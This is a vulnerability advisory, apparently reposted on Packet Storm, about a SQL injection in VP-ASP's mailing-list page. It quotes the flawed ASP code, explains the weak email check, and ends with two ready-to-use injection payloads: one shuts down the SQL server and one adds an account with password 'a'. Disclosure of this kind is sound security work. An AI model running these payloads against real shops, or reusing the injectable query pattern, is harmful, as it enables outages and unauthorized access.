VP-ASP suffers from a SQL injection vulnerability. Details provided.
62abaf2555cb5ce6eb0e01fb2253fe5f
************************************************** !!! WARNING !!! ***********************************************************
* FOR EDUCATIONAL PURPOSES ONLY! *
******************************************************************************************************************************
* Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect *
* or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, *
* including without limitation any PC, other equipment or other property, even if I am Expressly advised of *
* the possibility of such damages. I DO NOT encourage criminal activities. If you use this advisory or commit *
* criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, *
* and/or reading anything from this advisory you are considered to have accepted the terms and conditions and have read *
* this disclaimer. Once again this advisory is for educational purposes only. *
******************************************************************************************************************************
* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *
VP-ASP x.x.x shopmaillist.asp SQL Injection (TESTED ON 5.xx/6.00>?) discovered by tracewar(tracewar@gmail.com).
the SQL injection exists in the UpdateCustomer procedure:
Sub UpdateCustomer
if getconfig("xMYSQL")="Yes" then
MYSQLMaillistUpdateCustomer
exit sub
end if
dim dbc, whereok
dim doupdate, templastname
OpenCustomerDb dbc
Set objRS = Server.CreateObject("ADODB.Recordset")
templastname=replace(strlastname,"'","''")
SQL = "SELECT * FROM " & dbtable & " WHERE "
whereok=""
sql=sql & whereok & " LastName='" & TempLastName & "'"
whereok = " AND "
SQL = SQL & whereok & " email='" & stremail & "'"
objRS.open SQL, dbc, adOpenKeyset, adLockOptimistic, adcmdText
'debugwrite sql
if not ObjRS.eof then
DoUpdate="True"
else
objRs.close
set objRS=nothing
end if
If Doupdate="" then
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable
objRS.AddNew
end if
Updateminimuminfo objrs
CloseRecordset objRS
ShopCloseDatabase dbc
end sub
If you keep tracking the code you will notice the "stremail" query isn't checked properly for SQL injections:
Else
ValidateData()
if sError = "" Then
If unsubscribe="" then
UpdateCustomer
SendMailToMerchant LangMailListRegistration
WriteInfo
the ValidateData() procedure is totally useless:
Sub ValidateData
strFirstname = Request.Form("strFirstname")
strLastname = Request.Form("strLastname")
strEmail = Request.Form("strEmail")
unsubscribe=request("blnmaillist")
ValidateMininumInfo
End Sub
Sub ValidateMininumInfo
BlnMailList=TRUE
If strLastname = "" Then
sError = sError & LangCustLastname & LangCustRequired & "<br>"
End If
If strEmail = "" Then
sError = sError & LangCustEmail & LangCustRequired & "<br>"
Else
CustomerValidateEmail stremail
end If
end sub
Sub CustomerValidateEmail (stremail)
If Not InStr(strEmail, "@") > 1 Then
Serror=Serror & LangInvalidEmail & "<br>"
end if
End sub
the query must contain @ as a first character in order to pass the CustomerValidateEmail useless procedure.
oh and this is also the reason why sql injection scanners didn't detect this injection earlier(HMPF HMPF *TIP* :P)
quick hack:
write this as email: JUNK@';shutdown--
in order to shutdown the sql server.
write this as email: asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')--
in order to add user 'a' with password 'a'.
THE END.
* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!